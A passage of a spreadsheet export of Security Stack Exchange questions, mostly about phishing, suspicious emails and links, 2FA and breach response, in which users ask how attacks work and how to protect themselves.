 &lt;p&gt;Obviously, if the GUI of the e-mail client can be modified, the verification can happen as the mail is authored.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Step three:&lt;/strong&gt; If the author takes no action, the recipients get the e-mail after three minutes, but are presented with this message when they click the (doctored) link:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/D59Op.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/D59Op.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Over time, the user-vetted whitelist could be augmented with white- and blacklists provided by the security part of the organization.&lt;/p&gt;
 &lt;p&gt;The assumption is that this would intercept most link-based phishing attacks with a message of caution, while also keeping employees alert, due to the two factor authentication involved, without significantly degrading the user experience or imposing excessive policing of the employees.&lt;/p&gt;
 &lt;p&gt;So again, what are your counterarguments, related to both security and user experience?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Does U2F prevent phishing of passwords?</t>
  </si>
  <si>
    <t>&lt;p&gt;U2F is touted as a new 2 factor authentication standard that has built in defense against phishing attacks. As I understand it, this works by registering the device with each service, thereby creating a unique keypair. If a phishing site pretends to be someone, they will fail that cryptographic check and the key fob won't activate&lt;/p&gt;
 &lt;p&gt;But as I understand it, the phishing site may still be able to steal the user password. Nothing prevents the user from inadvertently entering their password on a malicious site (even though the single password is not enough to crack the account). Is that correct?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;u2f&gt;</t>
  </si>
  <si>
    <t>How do I safely inspect a suspicious email attachment?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a pretty blatantly spammy email to my Gmail account. Attached to the email is a supposed HTML file. My first hunch was that it was probably one of the following:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;A nasty executable file masquerading as a simple HTML file, or&lt;/li&gt;
 &lt;li&gt;An actual HTML file meant to be opened in a browser in a phishing attack&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;My guess is that it really is an HTML file, since Gmail claims the attachment is only 1K in size.&lt;/p&gt;
 &lt;p&gt;I know I should probably just mark this as spam and get on with my life, but my curiosity is getting the best of me... I really want to know what's in that attachment. Is there a safe way to go about downloading it to a sandboxed location and inspecting the contents? I'm at the beginning of a career shift into the security field, and I would love to pick apart this real world example of something potentially nasty and see how it ticks.&lt;/p&gt;
 &lt;p&gt;I'm thinking a LiveCD or a VM would be a safe environment... I would prefer to do it in a clean, un-networked environment, but in any case, I'll still be logging into my Gmail account to download the thing.&lt;/p&gt;
 &lt;p&gt;Any suggestions?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Is EICAR a valid test for a mail virus scanner?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a fairly standard commercial e-mail setup, we use Outlook and Exchange and have a very well known third party service providing spam &amp;amp; phishing filtering and virus and malware scanning.&lt;/p&gt;
 &lt;p&gt;I ran a test using the Kaspersky version of the EICAR standard file (for those who don't know EICAR is a standard test used to trigger your anti virus response without any risk of virus infection - more here &lt;a href="https://support.kaspersky.com/viruses/general/459" rel="nofollow noreferrer"&gt;Kaspersky EICAR&lt;/a&gt;)&lt;/p&gt;
 &lt;p&gt;The EICAR com file is compressed in a zip file which I attached to a mail and sent it to several people, all users received the mail with the attachment in tact and with no warning messages to the user and no alerts on the mail scanner log, the file just bypassed the scanner. On opening the attachment Microsoft Intune immediately responded and cleaned the 'virus'. For comparison, i sent the same email to my Gmail address which filtered out the message. &lt;/p&gt;
 &lt;p&gt;Are there any valid reasons that a mail virus scanner would not detect the EICAR file as a real virus and respond accordingly?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;virus&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Is it safe to answer to a suspected email as long as I don't click any link?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email and I'm not sure it's authentic. It asks to answer to the email itself:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;without editing the subject&lt;/li&gt;
 &lt;li&gt;to activate a service &lt;/li&gt;
 &lt;li&gt;it doesn't ask me to click any link (except for confirming I have read the content, but it's optional) &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;and&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;it doesn't contain any attachments&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I should only answer to it to activate the service, and even in the case it was a scam my name is not visible when I send emails. I wonder:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;given that I received a fake email/attempt of phishing, as long as I don't click any link is it still risky to answer to it?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Is a safelinks.protection.outlook.com link phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Received an email which contain the below hyperlink&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://nam02.safelinks.protection.outlook.com/?url=http*3A*2F*2Factuallysale.com*2F&amp;amp;data=02*7C01*7C*7C548d20ace3ec4747fe1008d7d7d8b597*7C84df9e7fe9f640afb435aaaaaaaaaaaa*7C1*7C0*7C637215198062448150&amp;amp;sdata=nk69pKQ7jIMsMVSfWVFG*2B38GuiK08jysbwN114W*2BMpM*3D&amp;amp;reserved=0__;JSUlJSUlJSUlJSUlJSU!!FZtbJVnXfw!gfgjegEG3qJawMzvsQm9QRhNrDiubzuVygOX_4wENNasy-WnA7vie2xl_WVQEUA0rg$
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I checked the URL with urlscan.io and virustotal.com, but I could not find anything.&lt;/p&gt;
 &lt;p&gt;How can I know if this is phishing/malware or not? What do I look for?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is it secure to interact with a web page before it has fully loaded?</t>
  </si>
  <si>
    <t>&lt;p&gt;Web pages are often displayed in the browser before they have finished fully loading (i.e. the loading indicator is still spinning, etc).&lt;/p&gt;
 &lt;p&gt;Usually this is caused by a slow advert or a video, etc. But often there can be critical parts of the page that are not yet being displayed.&lt;/p&gt;
 &lt;p&gt;Is it safe to interact with the page while it is still loading? By interacting I mean all normal actions on the web, such as clicking links, filling out forms, pressing the back button, etc?&lt;/p&gt;
 &lt;p&gt;I believe that this can often cause history corruption, however could there be any cases where interacting with the page causes information to be POSTed to the wrong destination, or a hyperlink destination to be incorrect resulting in you accidentally visiting a phishing site, etc?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;logging&gt;&lt;integrity&gt;&lt;websites&gt;&lt;data-validation&gt;</t>
  </si>
  <si>
    <t>How does a CSRF logout pose a potential threat to a website?</t>
  </si>
  <si>
    <t>&lt;p&gt;Websites like &lt;a href="http://www.superlogout.com" rel="nofollow"&gt;SuperLogout&lt;/a&gt; logs the user out from several websites at one go.
 I want to know in what way does this pose a potential threat to the users of the website? &lt;/p&gt;
 &lt;p&gt;How can this be combined with a phishing attack?
 And any other potential threats? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;csrf&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What might an attacker do with email address as login name?</t>
  </si>
  <si>
    <t>&lt;p&gt;This might have been asked before, but I've looked for a few hours and can't find much.&lt;/p&gt;
 &lt;p&gt;I would also like some opinions on what an attacker might do if he enters an email address on a site and it responds with "That user ID is not available".&lt;/p&gt;
 &lt;p&gt;My first thought is that it leaks people's email addresses, so if you know the email address, they may be registered with the site (if the email wasn't hijacked).&lt;/p&gt;
 &lt;p&gt;Another attack scenario might be to guess a login if there's no 2/MFA. People tend to reuse passwords or close variants. This assumes the attacker can link this 'user ID email taken' to the same person. Another scenario might be social engineering, and registering a very similar email address for impersonation to send phishing emails. Account recovery at a site may be possible if it's done poorly, perhaps by sending a code to a linked recovery address that's usable, or expired so you can register it and get the code to recover the account on the site with that email login.&lt;/p&gt;
 &lt;p&gt;What else do you think an attacker might be able to do when you check for an email as a user name and it says the ID is not available?&lt;/p&gt;
 &lt;p&gt;I thought of the old Yahoo people directory closed in 2012, where you could enter a name and last name (and more, if you knew more), and try to find their Yahoo address.&lt;/p&gt;
 &lt;p&gt;Thanks!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;user-names&gt;&lt;registration&gt;</t>
  </si>
  <si>
    <t>I clicked what looked like an Amazon email, but it (maybe) was from an Amazon affiliate. Ended up at Amazon.com anyway. Can I safely investigate?</t>
  </si>
  <si>
    <t>&lt;p&gt;In a case of clicking too fast, I clicked on a picture that looked like it was from Amazon. However this was not the case. I did end up at Amazon, but I'm aware that other things could've taken place before I landed on the Amazon page. I immediately disconnected my Ethernet cable. I hovered my mouse over the link address and did a URL search in virustotal for the domain on another PC and it came back safe. I googled the name in the link I clicked and I saw that the domain was a Amazon affiliate, or so they say. But I still wiped my machine. However I am still not sure if that link was malicious or not. Knowing whether it was malicious or not has implications for how I move forward and what steps I take to remediate this problem. Is there a safe way to investigate the link and any payload that may have been delivered?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;xss&gt;&lt;virus&gt;&lt;phishing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Is authentication using personal pictures more secure than passwords?</t>
  </si>
  <si>
    <t>&lt;h2&gt;Statement 1&lt;/h2&gt;
 &lt;p&gt;There is a start up called &lt;a href="http://pixelpin.co.uk/" rel="noreferrer"&gt;PixelPin&lt;/a&gt;. On the web site it reads:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;The PixelPin solution is simple and quick to use, yet very secure.
 PixelPin &lt;strong&gt;eliminates the traditional alphanumeric password&lt;/strong&gt; by using a
 picture based approach. The user chooses an image that‚Äôs personal to
 them (e.g. a photograph of their family or a memorable holiday photo).
 They then choose 4 points (Passpoints) in sequence on the image. The
 PixelPin process &lt;strong&gt;eliminates the risk of phishing, dictionary attacks
 and brute force hacking&lt;/strong&gt;. There‚Äôs also a growing body of academic
 research suggesting that people remember Passpoints on a personal
 image more easily given the emotional connection evoked during the
 process.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;hr /&gt;
 &lt;h2&gt;Statement 2&lt;/h2&gt;
 &lt;p&gt;However, &lt;a href="http://www.gpg4win.org/about.html" rel="noreferrer"&gt;Cleopatra&lt;/a&gt;, a certificate manager for OpenPGP and X.509 (S/MIME) and common crypto dialogs, says that&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Photos give a false sense of security.&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/rRKVb.png" alt="enter image description here" /&gt;&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;Statement 1 seems to contradict Statement 2.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt; what is this noise about picture-based authentication. Is it secure to use or not?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;pgp&gt;</t>
  </si>
  <si>
    <t>Have there been any case studies on intentional vulnerabilities or malware in open source projects?</t>
  </si>
  <si>
    <t>&lt;p&gt;In my experience, it's a common mantra that open source tends to be secure due to its availability for open scrutiny. I tend to agree with this. At the same time it's no secret that vulnerabilities are constantly discovered.&lt;/p&gt;
 &lt;p&gt;Moreover, I feel it's easy to imagine that developers &lt;strong&gt;very eagerly&lt;/strong&gt; obtain libraries and tools and that are available in various repositories. I believe that these resources are regularly grabbed hastily for experimentation, and sometimes adopted into larger projects without much scrutiny (maybe besides a license compatibility check, and some assurance that the feature set matches what's desired)&lt;/p&gt;
 &lt;p&gt;What comes to mind is PyPI, Dockerhub, etc.&lt;/p&gt;
 &lt;p&gt;I would like to know if there are many documented cases of things like:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Successful malicious contributions to prevalent open source software&lt;/li&gt;
 &lt;li&gt;Smaller projects that popped up that could be considered malware under the guise of providing some simple but appealing functionality&lt;/li&gt;
 &lt;li&gt;Reports of foul play on attempted contributions&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I understand that be best FOSS projects have high quality maintainers, but I also see this current world of nonstop spamming, phishing, spearphishing, identity theft and aggressive governments. I personally have a difficult time believing that bad actors would ever take a break from trying to make malitious contributions to these projects, given how they seldem take a break from their other nasty tasks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;opensource&gt;</t>
  </si>
  <si>
    <t>Can a man engaged in phishing be prosecuted if I know his IP?</t>
  </si>
  <si>
    <t>&lt;p&gt;My familiar received some emails from a man she meets at dating site. The man sent her his photos by email. In them he made some attempts that looked like phishing so I decided to lookup more information about him. I found that those photos are easily accessible in Facebook and belong to a man with a quiet good reputation living in US. All emails came from different IP addresses but some of them are located in Ghana:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;197.251.136.205
 197.251.164.116
 197.251.140.152
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and other one in Nigeria:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;41.184.75.187
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and the last &lt;a href="http://www.projecthoneypot.net/ip_41.184.75.187" rel="nofollow"&gt;is known to be used by spammers&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Is there a way this man can be prosecuted?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;legal&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Would a signed TLS certificate prevent an attacker from stealing a domain?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to understand how the attack described in &lt;a href="https://www.wired.com/2016/10/anonymous-notorious-hacker-back-hes-gone-legit/" rel="nofollow noreferrer"&gt;this article&lt;/a&gt; could work. Let's grant that this attacker, not associated with &lt;code&gt;company.com&lt;/code&gt;, managed to take control of &lt;code&gt;oldsub.company.com&lt;/code&gt;. Here's a description from the article:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Monsegur had used a trick known as domain name system enumeration to dig up one of the company‚Äôs defunct subdomains that had once directed visitors to a third-party service. He‚Äôd built his phishing site on the same URL of that service, so that the fake login page appeared to be hosted inside the company‚Äôs own network.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Here's the part I can't figure out: Presumably this company has a CA-signed certificate for &lt;code&gt;company.com&lt;/code&gt;. Unless he was also able to steal the private key for that certificate, wouldn't anyone navigating to the stolen &lt;code&gt;oldsub.company.com&lt;/code&gt; domain get a big browser security warning, that whatever certificate the hacker attempted to use for the stolen domain is not trusted?&lt;/p&gt;
 &lt;p&gt;Of course, since this was a staged, white-hat attack, maybe the attacker did have access to the real certificate. If that's the case, would a &amp;quot;victim&amp;quot; of the attack be able to claim that they checked the domain and received no certificate error, and that should prove the site is legitimate?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;dns&gt;</t>
  </si>
  <si>
    <t>How do I investigate where personal information in a fraudulent email was leaked from?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have seen an email which is obvious from the content that it's a phishing/spurious email. However, the personal content is quite revealing and specific to that individual. How could I go about investigating how and where this personal data was 'leaked' from?&lt;/p&gt;
 &lt;p&gt;A sample of the content/text is:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Dear XXX, Invoice - HWNG6945RYVIZ
 NAME SURNAME
 1st Line of address
 2nd Line of address
 County
 Postcode
 Pass - 1234
 I look forward to hearing from you,
 Sender's Name
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Also worth noting that there is a zip attachment to the email so that's a massive stand out No No that this is dodgy. However, as above the information they do contain is scarily accurate. So where did they get this from?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;sensitive-data-exposure&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>How to reset account passwords after falling victim to password reuse?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently had one of my accounts compromised after falling victim to an online phishing scam. To make matters worse, while I've used unique passwords for any account created in the past few years, &lt;strong&gt;my 14 year-old self made the critical mistake of &lt;a href="https://security.stackexchange.com/questions/101385/is-password-reuse-a-problem-if-the-password-is-very-strong"&gt;reusing passwords&lt;/a&gt; between multiple accounts.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Since then, I have received emails from several sites warning me of login attempts from unauthorized sources. To keep my account secure, &lt;strong&gt;I'm now faced with the arduous task of resetting passwords for nearly 280 different accounts.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I've attempted to use &lt;a href="http://www.pcworld.com/article/2857805/nifty-new-lastpass-dashlane-features-can-change-your-passwords-for-you.html" rel="nofollow noreferrer"&gt;LastPass's Automatic Password Reset&lt;/a&gt;, but have had limited success. It requires manually checking which sites are supported, lacks an option for resetting multiple accounts at once, and sometimes fails to register successful password resets.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;How should I go about resetting multiple account passwords after a security breach?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;password-management&gt;&lt;system-compromise&gt;&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>What is "JavaGhost - Mass Twilio Checker"?</t>
  </si>
  <si>
    <t>&lt;p&gt;Over the past week, the account credentials for my organization's Twilio account were stolen and used to send ~10,000 fraudulent SMS messages claiming to be from a major bank.&lt;/p&gt;
 &lt;p&gt;The passwords have all been changed, the secrets have been rotated, and the &amp;quot;subaccounts&amp;quot; created by the scammer have been removed.&lt;/p&gt;
 &lt;p&gt;I have no idea how they managed to get the information for this account, and I suspect I'll never know, since it only occurs in one config file on one server and the access logs for that server do not show any access to the file.&lt;/p&gt;
 &lt;p&gt;In analyzing the sent messages, I found a number of repetitions of the following text, all sent to the same phone number:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;JavaGhost - Mass Twilio Checker&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I'm guessing that this is the attacker checking that they still have access to the account, but I've been looking around and can't seem to find any more information (other than that a number of people seem to use the nickname JavaGhost online).&lt;/p&gt;
 &lt;p&gt;I'm curious if anyone knows more about this type of attack and what is going on with these messages.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;sms&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>Blocking a redirect link in an iframe on a chat site</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a shortened link being spread which contains an @ symbol. j.mp/s@mething, and it's used for phishing purposes.
 When trying to block it, for some reason it doesn't like the @ character&lt;/p&gt;
 &lt;p&gt;I want to know the bit.ly protocol and what code I can use to block this.
 http and https don't work for it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;</t>
  </si>
  <si>
    <t>Is this file malicious and how is it being transfered via youtube?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today on my blog a spam comment appeared. I noticed a Youtube link being in the spam comment, which I found to be rather odd as no other link was distributed. I opened the link in a sandbox environment and it turned out to download a flash file of some sort, which seemed rather strange to me considering the url is a legit Youtube link as far as I can see:&lt;/p&gt;
 &lt;p&gt;The following link should be considered unsafe until otherwise proven!&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;m &amp;lt;DOT&amp;gt; youtube &amp;lt;DOT&amp;gt; com/e/7wQ-hZEVLeY
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I tested the file using virustotal.com but not even a single anti-virus program flagged the file as being malicious.&lt;/p&gt;
 &lt;p&gt;I have a hard time believing that a spam comment was made containing only a single link, which downloads a flash file is not malicious so I am seeking assistence here to what the file actually is, if it should be considered malware and how it is possible to use Youtube to distribute this file. I am especially interested in that last question.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to protect email addresses in a customer database when you and other third parties must be able to send emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am wondering what methods are used by big companies to protect customer email addresses in their databases. They usually have salespeople all over the world and multiple third-parties (Salesforce, transactional emails, etc.) also need to access the data and need to be able to send emails to customers, making regular encryption methods not really practical.&lt;/p&gt;
 &lt;p&gt;I am working on a project where we will have to store and interact with a large amount of customers via email and I can't find a solution other than storing their email addresses in plain text in order to be accessible to third-parties and our salespeople. But that doesn't seem very compliant and safe as a data leak could create a serious impact for our customers (phishing, use it to login, etc.).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;email&gt;&lt;databases&gt;&lt;gdpr&gt;&lt;pii&gt;</t>
  </si>
  <si>
    <t>What can happen when you click on a bad link?</t>
  </si>
  <si>
    <t>&lt;p&gt;I sleepily clicked on this bad link yesterday (DONT CLICK Unless you know what you're doing: &lt;code&gt;https://6to.me/idsoni7kjv&lt;/code&gt; with a &amp;quot;?fbclid=&amp;quot; param - presumably identifying me)&lt;/p&gt;
 &lt;p&gt;I'm wondering how much harm could be done. I'm sure it could try to phish me with mimic websites, but it didn't seem to do that. I'm more worried about whether clicking on a link is sufficient to allow something worse, like installing something on my computer or browser?&lt;/p&gt;
 &lt;p&gt;Further, is there a safe way to investigate what that webpage is trying to do?&lt;/p&gt;
 &lt;p&gt;In case it's relevant, I'm on firefox on a mac. Thank you for any pointers!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;web-browser&gt;&lt;attacks&gt;&lt;virus&gt;&lt;browser-hijacking&gt;</t>
  </si>
  <si>
    <t>How does this possibly malicious phishing email link work?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got a phishing email from a supposed realtor that wanted me to click on the following link&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://wonderit.net/f%23$%25%5e%29%28*%5e%25$%25%5eamg*&amp;amp;%5e%25$%23$%25%5e/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;which I decoded as:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://wonderit.net/f#$%^)(*^%$%^amg*&amp;amp;^%$#$%^/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I was curious about the URL query or command because I haven't seen one like this before. Can someone explain to me how this malicious link works? Is &lt;code&gt;f#$%^)(*^%$%^amg*&amp;amp;^%$#$%^/&lt;/code&gt; an encoding of some sort? Or is it something designed to attack this server? Is it a bash script or some other command?&lt;/p&gt;
 &lt;p&gt;&lt;sub&gt;
  PS. Of course, I haven't tried to open the page at all
 &lt;/sub&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;spam&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Incident response and recovery from a security breach with unknown attack vector</t>
  </si>
  <si>
    <t>&lt;p&gt;Security breaches, hacks, ‚Äúcyber‚Äù attacks or server compromises happen quite frequently, unfortunately, such as Quora in &lt;a href="https://blog.quora.com/Quora-Security-Update" rel="nofollow noreferrer"&gt;December 2018&lt;/a&gt;, Facebook in &lt;a href="https://www.nytimes.com/2018/09/28/technology/facebook-hack-data-breach.html" rel="nofollow noreferrer"&gt;September 2018&lt;/a&gt;, Equifax in &lt;a href="https://www.bloomberg.com/news/articles/2017-09-08/equifax-sued-over-massive-hack-in-multibillion-dollar-lawsuit" rel="nofollow noreferrer"&gt;September 2017&lt;/a&gt;, Exactis in &lt;a href="https://www.wired.com/story/exactis-database-leak-340-million-records/" rel="nofollow noreferrer"&gt;June 2018&lt;/a&gt;, MyFitnessPal in &lt;a href="https://content.myfitnesspal.com/security-information/notice.html" rel="nofollow noreferrer"&gt;March 2018&lt;/a&gt;, and &lt;a href="https://www.troyhunt.com/ive-just-added-2844-new-data-breaches-with-80m-records-to-have-i-been-pwned/" rel="nofollow noreferrer"&gt;thousands of others&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;With regulations that dictate mandatory breach notifications, such as the GDPR, we can expect that the number of cases will continue to grow. Moreover, it‚Äôs likely that there are tons of cases that are simply unknown to the public, have been unreported, or even undetected by the companies themselves.&lt;/p&gt;
 &lt;p&gt;Yet to my surprise, what I never hear about is a company going offline for a while because they are still investigating and haven‚Äôt yet found out how the attackers got in, or a company falling victim to another attack again within a few days or weeks.&lt;/p&gt;
 &lt;p&gt;(That is, except from some &lt;a href="https://krebsonsecurity.com/2018/07/hackers-breached-virginia-bank-twice-in-eight-months-stole-2-4m/" rel="nofollow noreferrer"&gt;rare cases&lt;/a&gt;, of course. Though preventing another (spear) phishing attack is, of course, not something you can just apply a patch for, it‚Äôs a process.)&lt;/p&gt;
 &lt;p&gt;There may be compromises following attack vectors which are hard to detect, e.g. rowhammer, spectre, certain zero-days, &lt;a href="https://www.zdnet.com/article/mystery-still-surrounds-hack-of-php-pear-website/" rel="nofollow noreferrer"&gt;an infected package manager opening reverse shells&lt;/a&gt;, etc. If attackers got access to a company‚Äôs network by using credentials they obtained from a phishing attack against an employee, and they cleaned up their traces and deleted logs, it might be imaginable that neither a company nor their forensic advisors are able to detect how the attack succeeded.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Do NOT put the affected systems back online until this stage is fully complete [...] Examine the 'attacked' systems to understand how the attacks succeeded in compromising your security. Make every effort to find out where the attacks "came from" [...]&lt;/p&gt;
  &lt;p&gt;‚Äì &lt;a href="https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server/218011#218011"&gt;Rob Moir&lt;/a&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;We should expect some companies to go offline for a few hours while they do their analysis and recovery, some for a few days, and some never coming back online, shouldn‚Äôt we?&lt;/p&gt;
 &lt;p&gt;Are all companies, even those with horrific vulnerabilities, excellent at intrusion detection and forensic analysis, or did I just miss something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;incident-response&gt;&lt;recovery&gt;&lt;incident-analysis&gt;</t>
  </si>
  <si>
    <t>Security of an initial redirection from http://example.com to https://example.com</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose that &lt;code&gt;http://example.com/&amp;lt;foo&amp;gt;&lt;/code&gt; systematically redirects to &lt;code&gt;https://example.com/&amp;lt;foo&amp;gt;&lt;/code&gt;. I enter &lt;code&gt;http://example.com&lt;/code&gt; in my browser's URL bar, and I see a page load and the URL bar now displays exactly &lt;code&gt;https://example.com/&lt;/code&gt; (no Unicode hack, no whitespace hack, etc.). I verify that this is the case (most users won't, but assume that in this case the user did). Further assume that my browser isn't vulnerable to &lt;a href="https://security.stackexchange.com/questions/9336/are-address-bars-unphishable/9340#9340"&gt;URL bar faking&lt;/a&gt;. Also assume that the SSL certificate is valid.&lt;/p&gt;
 &lt;p&gt;In this situation, can I trust that from now on my session is not vulnerable to any man-in-the-middle attack? Could a MITM on the initial HTTP connection have injected &lt;em&gt;something&lt;/em&gt; ‚Äî¬†a cookie, a hidden frame, whatever that would compromise the subsequent apparent HTTPS session?&lt;/p&gt;
 &lt;p&gt;&lt;sub&gt; This is a subcase of How secure is redirecting user from &lt;a href="http://normal.bank.com" rel="noreferrer"&gt;http://normal.bank.com&lt;/a&gt; to &lt;a href="https://secure.bank.com" rel="noreferrer"&gt;https://secure.bank.com&lt;/a&gt;?, I'm after more details for this specific case. &lt;/sub&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;web-application&gt;&lt;web-browser&gt;&lt;http&gt;</t>
  </si>
  <si>
    <t>Does Ransomware on one computer put entire network at risk?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was visiting an office recently where one computer had become infected with a ransomware variant and turned off until the 'network guy' could come take a look (I don't know which one as no one took an image of the screen or was at all knowledgeable about security issues).&lt;/p&gt;
 &lt;p&gt;If the infected computer is on an ethernet network with other computers all on the same subnet, are those computers likely to be infected also &lt;strong&gt;as a result of the first computer becoming infected&lt;/strong&gt;? I realize that they might be infected independently due to lack of whitelisting, spearphishing, etc.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ransomware&gt;</t>
  </si>
  <si>
    <t>App-based 2FA versus Hardware-based 2FA</t>
  </si>
  <si>
    <t>&lt;p&gt;How do apps like Symantec VIP / Okta Verify and similar implementations compare to using a hardware auth token such as the recent U2F devices?&lt;/p&gt;
 &lt;p&gt;How real is the possibility of an Android system being hijacked and 2FA app authentication tokens or otherwise secret keys being extracted?&lt;/p&gt;
 &lt;p&gt;Besides not needing another device, are there any other advantages to app-based 2FA?&lt;/p&gt;
 &lt;p&gt;Given that with app-based 2FA you authenticate a request or login session in real-time, is it not vulnerable to real-time authentication replay phishing attacks?&lt;/p&gt;
 &lt;p&gt;Edit: This seems to be sort-of answered here &lt;a href="https://security.stackexchange.com/questions/169992/can-a-smartphone-strictly-be-viewed-as-the-something-you-posses-factor-for-2fa"&gt;Can a smartphone strictly be viewed as the &amp;#39;something you posses&amp;#39; factor for 2FA when it has no hardware token capability like smartcards?&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;android&gt;&lt;multi-factor&gt;&lt;u2f&gt;</t>
  </si>
  <si>
    <t>Why would someone open a Netflix account using my Gmail address?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is something that happened to me a few months ago. I don't know if it is a hack attempt, although I can't think of any way that there could be any danger or any personal information gained.&lt;/p&gt;
 &lt;p&gt;I don't have a Netflix account and never have done. I have a Gmail address which I have never used for public communication. Suddenly I started getting email to this Gmail address from Netflix - not a "Welcome to Netflix" email or one requesting address verification, but what looked like a monthly promo for an existing account. This was addressed to someone with a different real name, with that name not similar in any way to the Gmail name.&lt;/p&gt;
